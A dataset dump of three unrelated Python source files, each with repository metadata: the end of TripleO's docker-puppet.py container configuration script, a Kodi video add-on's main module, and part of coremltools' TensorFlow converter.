os.path.isfile(hashfile): with open(hashfile) as f: hash_data = f.read().rstrip() return hash_data def rm_container(name): if os.environ.get('SHOW_DIFF', None): log.info('Diffing container: %s' % name) subproc = subprocess.Popen(['/usr/bin/docker', 'diff', name], stdout=subprocess.PIPE, stderr=subprocess.PIPE) cmd_stdout, cmd_stderr = subproc.communicate() if cmd_stdout: log.debug(cmd_stdout) if cmd_stderr: log.debug(cmd_stderr) log.info('Removing container: %s' % name) subproc = subprocess.Popen(['/usr/bin/docker', 'rm', name], stdout=subprocess.PIPE, stderr=subprocess.PIPE) cmd_stdout, cmd_stderr = subproc.communicate() if cmd_stdout: log.debug(cmd_stdout) if cmd_stderr and \ cmd_stderr != 'Error response from daemon: ' \ 'No such container: {}\n'.format(name): log.debug(cmd_stderr) process_count = int(os.environ.get('PROCESS_COUNT', multiprocessing.cpu_count())) log.info('Running docker-puppet') config_file = os.environ.get('CONFIG', '/var/lib/docker-puppet/docker-puppet.json') log.debug('CONFIG: %s' % config_file) with open(config_file) as f: json_data = json.load(f) # To save time we support configuring 'shared' services at the same # time. 
For example configuring all of the heat services # in a single container pass makes sense and will save some time. # To support this we merge shared settings together here. # # We key off of config_volume as this should be the same for a # given group of services. We are also now specifying the container # in which the services should be configured. This should match # in all instances where the volume name is also the same. configs = {} for service in (json_data or []): if service is None: continue if isinstance(service, dict): service = [ service.get('config_volume'), service.get('puppet_tags'), service.get('step_config'), service.get('config_image'), service.get('volumes', []), ] config_volume = service[0] or '' puppet_tags = service[1] or '' manifest = service[2] or '' config_image = service[3] or '' volumes = service[4] if len(service) > 4 else [] if not manifest or not config_image: continue log.info('config_volume %s' % config_volume) log.info('puppet_tags %s' % puppet_tags) log.info('manifest %s' % manifest) log.info('config_image %s' % config_image) log.info('volumes %s' % volumes) # We key off of config volume for all configs. if config_volume in configs: # Append puppet tags and manifest. log.info("Existing service, appending puppet tags and manifest") if puppet_tags: configs[config_volume][1] = '%s,%s' % (configs[config_volume][1], puppet_tags) if manifest: configs[config_volume][2] = '%s\n%s' % (configs[config_volume][2], manifest) if configs[config_volume][3] != config_image: log.warn("Config containers do not match even though" " shared volumes are the same!") else: log.info("Adding new service") configs[config_volume] = service log.info('Service compilation completed.') def mp_puppet_config((config_volume, puppet_tags, manifest, config_image, volumes)): log.debug('config_volume %s' % config_volume) log.debug('puppet_tags %s' % puppet_tags) log.debug('manifest %s' % manifest) log.debug('config_image %s' % config_image) log.debug('volumes %s' % volumes) sh_script = '/var/lib/docker-puppet/docker-puppet.sh' with open(sh_script, 'w') as script_file: os.chmod(script_file.name, 0755) script_file.write("""#!/bin/bash set -ex mkdir -p /etc/puppet cp -a /tmp/puppet-etc/* /etc/puppet rm -Rf /etc/puppet/ssl # not in use and causes permission errors echo "{\\"step\\": $STEP}" > /etc/puppet/hieradata/docker.json TAGS="" if [ -n "$PUPPET_TAGS" ]; then TAGS="--tags \"$PUPPET_TAGS\"" fi # workaround LP1696283 mkdir -p /etc/ssh touch /etc/ssh/ssh_known_hosts FACTER_hostname=$HOSTNAME FACTER_uuid=docker /usr/bin/puppet apply --verbose $TAGS /etc/config.pp # Disables archiving if [ -z "$NO_ARCHIVE" ]; then archivedirs=("/etc" "/root" "/var/lib/ironic/tftpboot" "/var/lib/ironic/httpboot" "/var/www") rsync_srcs="" for d in "${archivedirs[@]}"; do if [ -d "$d" ]; then rsync_srcs+=" $d" fi done rsync -a -R --delay-updates --delete-after $rsync_srcs /var/lib/config-data/${NAME} # Also make a copy of files modified during puppet run # This is useful for debugging mkdir -p /var/lib/config-data/puppet-generated/${NAME} rsync -a -R -0 --delay-updates --delete-after \ --files-from=<(find $rsync_srcs -newer /etc/ssh/ssh_known_hosts -print0) \ / /var/lib/config-data/puppet-generated/${NAME} # Write a checksum of the config-data dir, this is used as a # salt to trigger container restart when the config changes tar -c -f - /var/lib/config-data/${NAME} --mtime='1970-01-01' | md5sum | awk '{print $1}' > /var/lib/config-data/${NAME}.md5sum fi """) with tempfile.NamedTemporaryFile() as tmp_man: with 
open(tmp_man.name, 'w') as man_file: man_file.write('include ::tripleo::packages\n') man_file.write(manifest) rm_container('docker-puppet-%s' % config_volume) pull_image(config_image) dcmd = ['/usr/bin/docker', 'run', '--user', 'root', '--name', 'docker-puppet-%s' % config_volume, '--env', 'PUPPET_TAGS=%s' % puppet_tags, '--env', 'NAME=%s' % config_volume, '--env', 'HOSTNAME=%s' % short_hostname(), '--env', 'NO_ARCHIVE=%s' % os.environ.get('NO_ARCHIVE', ''), '--env', 'STEP=%s' % os.environ.get('STEP', '6'), '--volume', '%s:/etc/config.pp:ro' % tmp_man.name, '--volume', '/etc/puppet/:/tmp/puppet-etc/:ro', '--volume', '/usr/share/openstack-puppet/modules/:/usr/share/openstack-puppet/modules/:ro', '--volume', '/var/lib/config-data/:/var/lib/config-data/:rw', '--volume', 'tripleo_logs:/var/log/tripleo/', # OpenSSL trusted CA injection '--volume', '/etc/pki/ca-trust/extracted:/etc/pki/ca-trust/extracted:ro', '--volume', '/etc/pki/tls/certs/ca-bundle.crt:/etc/pki/tls/certs/ca-bundle.crt:ro', '--volume', '/etc/pki/tls/certs/ca-bundle.trust.crt:/etc/pki/tls/certs/ca-bundle.trust.crt:ro', '--volume', '/etc/pki/tls/cert.pem:/etc/pki/tls/cert.pem:ro', # script injection '--volume', '%s:%s:rw' % (sh_script, sh_script) ] for volume in volumes: if volume: dcmd.extend(['--volume', volume]) dcmd.extend(['--entrypoint', sh_script]) env = {} # NOTE(flaper87): Always copy the DOCKER_* environment variables as # they contain the access data for the docker daemon. for k in filter(lambda k: k.startswith('DOCKER'), os.environ.keys()): env[k] = os.environ.get(k) if os.environ.get('NET_HOST', 'false') == 'true': log.debug('NET_HOST enabled') dcmd.extend(['--net', 'host', '--volume', '/etc/hosts:/etc/hosts:ro']) dcmd.append(config_image) log.debug('Running docker command: %s' % ' '.join(dcmd)) subproc = subprocess.Popen(dcmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env) cmd_stdout, cmd_stderr = subproc.communicate() if subproc.returncode != 0: log.error('Failed running docker-puppet.py for %s' % config_volume) if cmd_stdout: log.error(cmd_stdout) if cmd_stderr: log.error(cmd_stderr) else: if cmd_stdout: log.debug(cmd_stdout) if cmd_stderr: log.debug(cmd_stderr) # only delete successful runs, for debugging rm_container('docker-puppet-%s' % config_volume) return subproc.returncode # Holds all the information for each process to consume. # Instead of starting them all linearly we run them using a process # pool. This creates a list of arguments for the above function # to consume. process_map = [] for config_volume in configs: service = configs[config_volume] puppet_tags = service[1] or '' manifest = service[2] or '' config_image = service[3] or '' volumes = service[4] if len(service) > 4 else [] if puppet_tags: puppet_tags = "file,file_line,concat,augeas,%s" % puppet_tags else: puppet_tags = "file,file_line,concat,augeas" process_map.append([config_volume, puppet_tags, manifest, config_image, volumes]) for p in process_map: log.debug('- %s' % p) # Fire off processes to perform each configuration. Defaults # to the number of CPUs on the system. 
p = multiprocessing.Pool(process_count) returncodes = list(p.map(mp_puppet_config, process_map)) config_volumes = [pm[0] for pm in process_map] success = True for returncode, config_volume in zip(returncodes, config_volumes): if returncode != 0: log.error('ERROR configuring %s' % config_volume) success = False # Update the startup configs with the config hash we generated above config_volume_prefix = os.environ.get('CONFIG_VOLUME_PREFIX', '/var/lib/config-data') log.debug('CONFIG_VOLUME_PREFIX: %s' % config_volume_prefix) startup_configs = os.environ.get('STARTUP_CONFIG_PATTERN', '/var/lib/tripleo-config/docker-container-startup-config-step_*.json') log.debug('STARTUP_CONFIG_PATTERN: %s' % startup_configs) infiles = glob.glob('/var/lib/tripleo-config/docker-container-startup-config-step_*.json') for infile in infiles: with open(infile) as f: infile_data = json.load(f) for k, v in infile_data.iteritems(): config_volume = match_config_volume(config_volume_prefix, v) if config_volume: config_hash = get_config_hash(config_volume_prefix, config_volume) if config_hash: env = v.get('environment', []) env.append("TRIPLEO_CONFIG_HASH=%s" % config_hash) log.debug("Updating config hash for %s, config_volume=%s hash=%s" % (k, config_volume, config_hash)) infile_data[k]['environment'] = env outfile = os.path.join(os.path.dirname(infile), "hashed-" + os.path.basename(infile)) with open(outfile, 'w') as out_f: json.dump(infile_data, out_f) if not success: sys.exit(1)
[]
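A minimal, standalone sketch of the shared-service merging performed in docker-puppet.py above: entries that share a config_volume get their puppet_tags joined with commas and their manifests joined with newlines. The merge_services helper and the sample entries below are illustrative assumptions, not part of the original script.

def merge_services(entries):
    # entries follow the [config_volume, puppet_tags, manifest, config_image, volumes] layout
    configs = {}
    for config_volume, puppet_tags, manifest, config_image, volumes in entries:
        if config_volume in configs:
            existing = configs[config_volume]
            if puppet_tags:
                existing[1] = '%s,%s' % (existing[1], puppet_tags) if existing[1] else puppet_tags
            if manifest:
                existing[2] = '%s\n%s' % (existing[2], manifest)
        else:
            configs[config_volume] = [config_volume, puppet_tags, manifest,
                                      config_image, list(volumes)]
    return configs

# Hypothetical sample data: two services sharing the 'nova' config volume.
sample = [
    ['nova', 'nova_config', 'include ::tripleo::profile::base::nova::api', 'centos-nova', []],
    ['nova', 'nova_paste_api_ini', 'include ::tripleo::profile::base::nova::metadata', 'centos-nova', []],
]
print(merge_services(sample))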
acitv/plugin.video.aci
main.py
c836096c90affd80949e51cd24517709a63eff52
# -*- coding: utf-8 -*- import sys import urllib import urlparse # import xbmc import xbmcgui import xbmcplugin import aci # Get the plugin url in plugin:// notation. _url = sys.argv[0] # Get the plugin handle as an integer number. _handle = int(sys.argv[1]) # Get an instance of ACI. ATV = aci.ACI() ATV.load_aci() # Encode user agent headers for video. user_agent_headers = urllib.urlencode({'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 ' 'Firefox/47.0 FirePHP/0.7.4', 'X-Requested-With': 'ShockwaveFlash/22.0.0.192' }) def get_url(**kwargs): """ Create a URL for calling the plugin recursively from the given set of keyword arguments. :param kwargs: "argument=value" pairs :type kwargs: dict :return: plugin call URL :rtype: str """ return '{0}?{1}'.format(_url, urllib.urlencode(kwargs)) def get_categories(): """ Get the list of video categories. Here you can insert some parsing code that retrieves the list of video categories (e.g. 'Movies', 'TV-shows', 'Documentaries' etc.) from some site or server. .. note:: Consider using `generator functions <https://wiki.python.org/moin/Generators>`_ instead of returning lists. :return: The list of video categories :rtype: types.GeneratorType """ return ATV.aci.iterkeys() def get_videos(category): """ Get the list of video files/streams. Here you can insert some parsing code that retrieves the list of video streams in the given category from some site or server. .. note:: Consider using `generators functions <https://wiki.python.org/moin/Generators>`_ instead of returning lists. :param category: Category name :type category: str :return: the list of videos in the category :rtype: list """ return ATV.aci[category] def list_categories(): """ Create the list of video categories in the Kodi interface. """ # Set plugin category. It is displayed in some skins as the name # of the current section. xbmcplugin.setPluginCategory(_handle, 'ACI') # Set plugin content. It allows Kodi to select appropriate views # for this type of content. xbmcplugin.setContent(_handle, 'videos') # Get video categories categories = get_categories() # Iterate through categories for category in categories: # xbmc.log(category.encode("utf-8"), xbmc.LOGNOTICE) # Create a list item with a text label and a thumbnail image. list_item = xbmcgui.ListItem(label=category.title()) # Set graphics (thumbnail, fanart, banner, poster, landscape etc.) for the list item. # Here we use the same image for all items for simplicity's sake. # In a real-life plugin you need to set each image accordingly. list_item.setArt({'thumb': "icon.png", 'icon': "icon.png", 'fanart': "icon.png"}) # Set additional info for the list item. # Here we use a category name for both properties for for simplicity's sake. # setInfo allows to set various information for an item. # For available properties see the following link: # https://codedocs.xyz/xbmc/xbmc/group__python__xbmcgui__listitem.html#ga0b71166869bda87ad744942888fb5f14 # 'mediatype' is needed for a skin to display info for this ListItem correctly. list_item.setInfo('video', {'title': category.title(), 'genre': category.title(), 'mediatype': 'video'}) # Create a URL for a plugin recursive call. # Example: plugin://plugin.video.example/?action=listing&category=[category name] url = get_url(action="listing", category=category) # is_folder = True means that this item opens a sub-list of lower level items. is_folder = True # Add our item to the Kodi virtual folder listing. 
xbmcplugin.addDirectoryItem(_handle, url, list_item, is_folder) # Add a sort method for the virtual folder items (alphabetically, ignore articles) xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE) # Finish creating a virtual folder. xbmcplugin.endOfDirectory(_handle) def list_videos(category): """ Create the list of playable videos in the Kodi interface. :param category: Category name :type category: str """ # Set plugin category. It is displayed in some skins as the name # of the current section. xbmcplugin.setPluginCategory(_handle, category) # Set plugin content. It allows Kodi to select appropriate views # for this type of content. xbmcplugin.setContent(_handle, 'videos') # Get the list of videos in the category. videos = get_videos(category) # Iterate through each video. for video_id in videos: # Get the video item to process. video_item = videos[video_id] # Create a list item with a text label and a thumbnail image. list_item = xbmcgui.ListItem(label=video_item["title"]) # Set additional info for the list item. # 'mediatype' is needed for skin to display info for this ListItem correctly. list_item.setInfo('video', {'title': video_item["title"], 'genre': category.title(), 'mediatype': 'video'}) # Set graphics (thumbnail, fanart, banner, poster, landscape etc.) for the list item. # Here we use the same image for all items for simplicity's sake. # In a real-life plugin you need to set each image accordingly. list_item.setArt({'thumb': video_item["thumbnail"], 'icon': video_item["thumbnail"], 'fanart': video_item["thumbnail"] }) # Set 'IsPlayable' property to 'true'. # This is mandatory for playable items! list_item.setProperty('IsPlayable', 'true') referer_header = urllib.urlencode({"Referer": video_item["location"]}) video_item['url'] += '|%s&amp;%s' % (user_agent_headers, referer_header) # Create a URL for a plugin recursive call. # Example: plugin://plugin.video.example/?action=play& # video=[video url] url = get_url(action='play', video=video_item['url']) # video_url = 'plugin://plugin.video.f4mTester/?url=' + urllib.quote_plus(video['video']) + \ # '&amp;streamtype=HLSRETRY&name=' + urllib.quote_plus(video['name']) + \ # '&amp;|User-Agent=Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 ' \ # 'FirePHP/0.7.4&amp;X-Requested-With=ShockwaveFlash/22.0.0.192&amp;Referer=' + \ # urllib.quote_plus(video['reference']) # url = get_url(action='play', video=video_url) # Add the list item to a virtual Kodi folder. # is_folder = False means that this item won't open any sub-list. is_folder = False # Add our item to the Kodi virtual folder listing. xbmcplugin.addDirectoryItem(_handle, url, list_item, is_folder) # Add a sort method for the virtual folder items (alphabetically, ignore articles) xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE) # Finish creating a virtual folder. xbmcplugin.endOfDirectory(_handle) def play_video(path): """ Play a video by the provided path. :param path: Fully-qualified video URL :type path: str """ # Create a playable item with a path to play. play_item = xbmcgui.ListItem(path=path) # Play with inputstream addon. play_item.setProperty('inputstreamaddon', 'inputstream.adaptive') play_item.setProperty('inputstream.adaptive.manifest_type', 'hls') # Pass the item to the Kodi player. 
xbmcplugin.setResolvedUrl(_handle, True, listitem=play_item) def router(paramstring): """ Router function that calls other functions depending on the provided paramstring :param paramstring: URL encoded plugin paramstring :type paramstring: str """ # Parse a URL-encoded paramstring to the dictionary of # {<parameter>: <value>} elements params = dict(urlparse.parse_qsl(paramstring)) # Check the parameters passed to the plugin if params: if params['action'] == 'listing': # Load the videos for aci. if params['category'] == "shows": ATV.update_aci_shows() print("Updated from main shows.") elif params['category'] == "cable": ATV.update_aci_cable() print("Updated from main cable.") elif params['category'] == "movies": ATV.update_aci_movies() print("Updated from main movies.") # Display the list of videos in a provided category. list_videos(params['category']) elif params['action'] == 'play': # Play a video from a provided URL. play_video(params['video']) else: # If the provided paramstring does not contain a supported action # we raise an exception. This helps to catch coding errors, # e.g. typos in action names. raise ValueError('Invalid paramstring: {0}!'.format(paramstring)) else: # Load ATV. ATV.load_aci() # If the plugin is called from Kodi UI without any parameters, # display the list of video categories list_categories() if __name__ == '__main__': # Call the router function and pass the plugin call parameters to it. # We use string slicing to trim the leading '?' from the plugin call paramstring router(sys.argv[2][1:])
[((19, 6, 19, 15), 'aci.ACI', 'aci.ACI', ({}, {}), '()', False, 'import aci\n'), ((23, 21, 26, 41), 'urllib.urlencode', 'urllib.urlencode', ({(23, 38, 26, 40): "{'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 FirePHP/0.7.4'\n , 'X-Requested-With': 'ShockwaveFlash/22.0.0.192'}"}, {}), "({'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 FirePHP/0.7.4'\n , 'X-Requested-With': 'ShockwaveFlash/22.0.0.192'})", False, 'import urllib\n'), ((82, 4, 82, 48), 'xbmcplugin.setPluginCategory', 'xbmcplugin.setPluginCategory', ({(82, 33, 82, 40): '_handle', (82, 42, 82, 47): '"""ACI"""'}, {}), "(_handle, 'ACI')", False, 'import xbmcplugin\n'), ((85, 4, 85, 44), 'xbmcplugin.setContent', 'xbmcplugin.setContent', ({(85, 26, 85, 33): '_handle', (85, 35, 85, 43): '"""videos"""'}, {}), "(_handle, 'videos')", False, 'import xbmcplugin\n'), ((123, 4, 123, 78), 'xbmcplugin.addSortMethod', 'xbmcplugin.addSortMethod', ({(123, 29, 123, 36): '_handle', (123, 38, 123, 77): 'xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE'}, {}), '(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)', False, 'import xbmcplugin\n'), ((125, 4, 125, 38), 'xbmcplugin.endOfDirectory', 'xbmcplugin.endOfDirectory', ({(125, 30, 125, 37): '_handle'}, {}), '(_handle)', False, 'import xbmcplugin\n'), ((137, 4, 137, 51), 'xbmcplugin.setPluginCategory', 'xbmcplugin.setPluginCategory', ({(137, 33, 137, 40): '_handle', (137, 42, 137, 50): 'category'}, {}), '(_handle, category)', False, 'import xbmcplugin\n'), ((140, 4, 140, 44), 'xbmcplugin.setContent', 'xbmcplugin.setContent', ({(140, 26, 140, 33): '_handle', (140, 35, 140, 43): '"""videos"""'}, {}), "(_handle, 'videos')", False, 'import xbmcplugin\n'), ((192, 4, 192, 78), 'xbmcplugin.addSortMethod', 'xbmcplugin.addSortMethod', ({(192, 29, 192, 36): '_handle', (192, 38, 192, 77): 'xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE'}, {}), '(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)', False, 'import xbmcplugin\n'), ((194, 4, 194, 38), 'xbmcplugin.endOfDirectory', 'xbmcplugin.endOfDirectory', ({(194, 30, 194, 37): '_handle'}, {}), '(_handle)', False, 'import xbmcplugin\n'), ((205, 16, 205, 43), 'xbmcgui.ListItem', 'xbmcgui.ListItem', (), '', False, 'import xbmcgui\n'), ((212, 4, 212, 64), 'xbmcplugin.setResolvedUrl', 'xbmcplugin.setResolvedUrl', (), '', False, 'import xbmcplugin\n'), ((38, 34, 38, 58), 'urllib.urlencode', 'urllib.urlencode', ({(38, 51, 38, 57): 'kwargs'}, {}), '(kwargs)', False, 'import urllib\n'), ((120, 8, 120, 71), 'xbmcplugin.addDirectoryItem', 'xbmcplugin.addDirectoryItem', ({(120, 36, 120, 43): '_handle', (120, 45, 120, 48): 'url', (120, 50, 120, 59): 'list_item', (120, 61, 120, 70): 'is_folder'}, {}), '(_handle, url, list_item, is_folder)', False, 'import xbmcplugin\n'), ((150, 20, 150, 63), 'xbmcgui.ListItem', 'xbmcgui.ListItem', (), '', False, 'import xbmcgui\n'), ((170, 25, 170, 78), 'urllib.urlencode', 'urllib.urlencode', ({(170, 42, 170, 77): "{'Referer': video_item['location']}"}, {}), "({'Referer': video_item['location']})", False, 'import urllib\n'), ((189, 8, 189, 71), 'xbmcplugin.addDirectoryItem', 'xbmcplugin.addDirectoryItem', ({(189, 36, 189, 43): '_handle', (189, 45, 189, 48): 'url', (189, 50, 189, 59): 'list_item', (189, 61, 189, 70): 'is_folder'}, {}), '(_handle, url, list_item, is_folder)', False, 'import xbmcplugin\n'), ((225, 18, 225, 49), 'urlparse.parse_qsl', 'urlparse.parse_qsl', ({(225, 37, 225, 48): 'paramstring'}, {}), '(paramstring)', False, 'import urlparse\n')]
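The Kodi plugin above builds its plugin:// call URLs with urllib.urlencode and parses them back in router() with urlparse.parse_qsl. A small round-trip sketch of that pattern, written against Python 3's urllib.parse rather than the Kodi/Python 2 modules the plugin itself uses; the base URL is a placeholder:

from urllib.parse import urlencode, parse_qsl

_url = 'plugin://plugin.video.aci/'  # placeholder base URL for the sketch

def get_url(**kwargs):
    # Build a recursive plugin call URL from keyword arguments.
    return '{0}?{1}'.format(_url, urlencode(kwargs))

url = get_url(action='listing', category='shows')
params = dict(parse_qsl(url.split('?', 1)[1]))
assert params == {'action': 'listing', 'category': 'shows'}
print(url)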
VadimLevin/coremltools
coremltools/converters/mil/frontend/tensorflow/converter.py
66c17b0fa040a0d8088d33590ab5c355478a9e5c
# Copyright (c) 2020, Apple Inc. All rights reserved. # # Use of this source code is governed by a BSD-3-clause license that can be # found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause import logging from coremltools.converters.mil.input_types import ( InputType, TensorType, ImageType, RangeDim, _get_shaping_class, ) from coremltools.converters.mil.input_types import Shape as InputShape from coremltools.converters.mil.mil.var import Var from coremltools.converters.mil.mil import get_new_symbol from coremltools.converters.mil.mil.types.symbolic import is_symbolic from coremltools.converters.mil.mil.types import is_tensor from coremltools.converters.mil.mil import types from .basic_graph_ops import topsort, simple_topsort from .convert_utils import convert_graph from coremltools.converters.mil.mil import Builder as mb from coremltools.converters.mil.mil import Program from coremltools.converters.mil.mil import Function from .ssa_passes.tf_passes import tensorflow_passes from coremltools.converters._profile_utils import _profile # TranscriptionContext maintains a map of tf_node.name --> ssa_var available # to the current TF --> tfssa transcription. class TranscriptionContext: def __init__(self, name=None): self.name = name if name is not None else "" self.context = {} self.graphs = {} # TF loops are represented as functions, so nested loops becomes # stacked functions. Stacked functions are translated to nested # blocks in Program, like # # while_loop(loop_vars=(%a, %b)) # cond_block1(%a.x, %b.x) { # ...some ops # } -> (%bool_var1) # body_block1(%a.x, %b.x) { # %ret_axx = while_loop(loop_vars=(%a.x,)) # cond_block2(%a.x.x) { # ...some ops # } -> (%bool_var2) # body_block2(%a.x.x) { # ...some ops # } -> (%new_a.x.x) # } -> (%ret_axx) # ....some ops using %ret_a # } -> (%ret_ax, %ret_bx) # # During the translation of cond_block2, we'd have func_input_stack # # (%a.x.x,) # (%a.x, %b.x) # # where [%a.x.x] would be unstacked once cond_block2 is done. self.func_input_stack = [] # list of tuple[Var] def add(self, tf_name, ssa_vars, is_new_var=True): """ ssa_vars: list[Var] / tuple[Var] (multiple outputs) or Var (single_output) is_new_var: True if ssa_vars are newly created for tf_name. """ if tf_name in self.context: # Overriding allow us to translate while_loop body twice (which is # needed to figure out shapes changes during iterates) msg = "TF var %s is added again. Overriding previous value" logging.info(msg % tf_name) if is_new_var and isinstance(ssa_vars, Var) and tf_name != ssa_vars.name: msg = ( "MIL op's name ({}) does not match TensorFlow's node name ({})." " Warning: Node added to context must have the same name as the name passed to context." 
) raise ValueError(msg.format(tf_name, ssa_vars.name)) self.context[tf_name] = ssa_vars def add_graph(self, graph_name, graph): self.graphs[graph_name] = graph def get_graph(self, graph_name): if graph_name not in self.graphs: msg = "Graph '{}' not found in: {}" raise KeyError(msg.format(graph_name, list(self.graphs.keys()))) return self.graphs[graph_name] def stack_func_inputs(self, inputs): self.func_input_stack.append(inputs) def unstack_func_inputs(self): if len(self.func_input_stack) == 0: raise ValueError("No func input available") self.func_input_stack.pop() def get_func_inputs(self): if len(self.func_input_stack) == 0: raise ValueError("No func input available") return self.func_input_stack[-1] def __getitem__(self, tf_name): if tf_name not in self.context: msg = "TF var {} not found in context {}" raise KeyError(msg.format(tf_name, self.name)) return self.context[tf_name] def __contains__(self, tf_name): return tf_name in self.context class TFConverter: def __init__(self, tfssa, inputs=None, outputs=None, **kwargs): """ tfssa: TensorFlow IR. inputs: list of TensorType or ImageType, optional, defaults to None. outputs: list of str or str, optional, defaults to None. A list of names of the output nodes or a str for single output name. If None, the converter will try to extract the output information from TensorFlow model. """ self.tfssa = tfssa self.global_type = {} self.inputs = None main_func = tfssa.functions["main"] graph = main_func.graph # Filter the inputs to only Placeholder names tf_placeholder_names = [n for n in graph if graph[n].op == "Placeholder"] placeholder_names = [] if inputs is not None: # Check inputs format if not isinstance(inputs, (list, tuple)): raise ValueError( "Type of inputs should be list or tuple, got {} instead.".format( type(inputs) ) ) if not all([isinstance(i, InputType) for i in inputs]): raise ValueError( "Type of inputs should be list or tuple of TensorType or ImageType, got {} instead.".format( [type(i) for i in inputs] ) ) # Special case: if there's only 1 input and 1 placeholder, we match them. if len(tf_placeholder_names) == 1 and len(inputs) == 1: if inputs[0].name is None: inputs[0].name = tf_placeholder_names[0] # filter out those inputs which is not in tf_placeholder_names inputs = [x for x in inputs if x.name in tf_placeholder_names] # We fill in shapes for user-specified input that doesn't have shape for inp in inputs: # Check inputs existence if inp.name is None: raise ValueError( "Unable to infer input's name or input name was not provided" ) if inp.name not in tf_placeholder_names: raise ValueError( "Input ({}) provided is not found in given tensorflow graph. Placeholders in graph are: {}".format( inp.name, tf_placeholder_names ) ) if inp.shape is None: shape = self._get_placeholder_shape_from_tf_graph(tfgraph=graph, name=inp.name) # _get_shaping_class does not accept -1 or None dimension. shape = [get_new_symbol() if s is None or s == -1 else s \ for s in shape] inp.shape = _get_shaping_class(shape) # Extract placeholders that users didn't specify. user_input_names = [inp.name for inp in inputs] for name in tf_placeholder_names: if name not in user_input_names: placeholder_names.append(name) else: inputs = [] placeholder_names = tf_placeholder_names # name -> (shape, mil_type) mapping. 
shape has type list[int] added_inputs = {} for inp in main_func.inputs: if inp not in placeholder_names: continue node = graph[inp] dtype = node.attr['dtype'] shape = self._get_placeholder_shape_from_tf_graph(tfgraph=graph, name=inp) shape = [get_new_symbol() if s is None or s == -1 else s \ for s in shape] inputs.append(TensorType(name=inp, shape=shape, dtype=dtype)) added_inputs[inp] = (shape, dtype) if len(added_inputs) > 0: logging.info( "Adding Input not specified by users: '{}'".format( added_inputs) ) for idx, inp in enumerate(inputs): # We set the default image format in TF as NHWC, since NHWC is used # for TF unless GPU is specified as device. if isinstance(inp, ImageType) and inputs[idx].channel_first is None: inputs[idx].channel_first = False self.inputs = tuple(inputs) for inputtype in self.inputs: if not isinstance(inputtype.shape, InputShape): continue if any([isinstance(s, RangeDim) for s in inputtype.shape.shape]): continue node = graph[inputtype.name] shape = [-1 if is_symbolic(s) else s for s in inputtype.shape.shape] node.attr["_output_shapes"] = [shape] # list of length 1 # infer outputs if not provided self._validate_outputs(tfssa, outputs) outputs = main_func.outputs if outputs is None else outputs outputs = outputs if isinstance(outputs, (tuple, list)) else [outputs] outputs = [x if isinstance(x, str) else x.name for x in outputs] self.outputs = outputs # We would like a stack so that we run conversion sequentially. self.graph_stack = self._get_stack(tfssa, root="main") self.context = TranscriptionContext() self.tensorflow_passes = tensorflow_passes def _get_placeholder_shape_from_tf_graph(self, tfgraph, name): error_message = "Unable to determine the shape of input: {}." \ " Please provide its shape during conversion, using \n" \ "'ct.convert(..., inputs=[ct.TensorType(name='{}', shape=(_FILL_ME_) ),])".format(name, name) if tfgraph[name].attr.get("shape", None) is not None: shape = tfgraph[name].attr["shape"] elif tfgraph[name].attr.get("_output_shapes", None) is not None: shape = tfgraph[name].attr["_output_shapes"][0] if shape is None: raise ValueError(error_message) else: raise ValueError(error_message) return shape def _get_stack(self, tfssa, root="main"): # We're trying to get a order of how to loop through the graphs. # This is NOT necessarily a DAG. dep = {x: [] for x in tfssa.functions} for fname in tfssa.functions: for node in tfssa.functions[fname].graph.values(): func_x, func_y = None, None if node.op == "while": func_x = node.attr["body_function"] func_y = node.attr["cond_function"] if func_x and fname not in dep[func_x]: dep[func_x].append(fname) if func_y and fname not in dep[func_y]: dep[func_y].append(fname) assert len(dep[root]) == 0 graph_stack = simple_topsort(dep) return graph_stack @staticmethod def _get_tensor_name(tensor): ret = None if isinstance(tensor, str): ret = tensor else: ret = tensor.name return ret.split(":")[0] def _validate_outputs(self, tfssa, outputs): if outputs is None: return outputs = outputs if isinstance(outputs, (tuple, list)) else [outputs] output_nodes = [] for f in tfssa.functions.values(): output_nodes += list(f.outputs) all_nodes = [] for f in tfssa.functions.values(): all_nodes += list(f.graph.keys()) for n in outputs: if self._get_tensor_name(n) not in output_nodes + all_nodes: raise KeyError('Output node name "{}" does exist.'.format(n)) def check_placeholder_output(self, prog, outputs_name): """ Handle the cases where placeholder is output. 
There is a case where the program is like main(%Placeholder: (5,fp32)) { block3() { } -> (%Placeholder) } But self.outputs = ["Placeholder:0"] We need to change the block output to Placeholder:0 by inserting an identity """ block = prog["main"] input_name = [x.name for x in list(block.inputs.values())] with block: new_outputs = [] for output, output_name in zip(block.outputs, outputs_name): if output.name not in input_name or output.name == output_name: new_output = output else: new_output = mb.identity(x=output, name=output_name) new_outputs.append(new_output) block.set_outputs(new_outputs) def convert_main_graph(self, prog, graph): func_inputs = {} for input_type in self.inputs: func_inputs[input_type.name] = mb.placeholder( input_type.shape.symbolic_shape, dtype=input_type.dtype) prog.set_main_input_types(self.inputs) with Function(func_inputs) as ssa_func: # Get the input Var for name in func_inputs.keys(): self.context.add(name, ssa_func.inputs[name]) outputs = convert_graph(self.context, graph, self.outputs) ssa_func.set_outputs(outputs) prog.add_function("main", ssa_func) # check duplicate output # Note: sometimes two outputs are pointing to the same Var, we should # create mb.identity for those cases block = prog["main"] with block: name_counts = {} new_outputs = [output for output in block.outputs] for i, v_o in enumerate(block.outputs): if v_o.name not in name_counts: name_counts[v_o.name] = 1 else: name_counts[v_o.name] += 1 new_name = v_o.name + "_duplicate_" + str(name_counts[v_o.name]) x = mb.identity(x=v_o, name=new_name) new_outputs[i] = x block.set_outputs(new_outputs) # Rename outputs to TF's name. This is needed when the last op doesn't # generate a new Var (e.g., 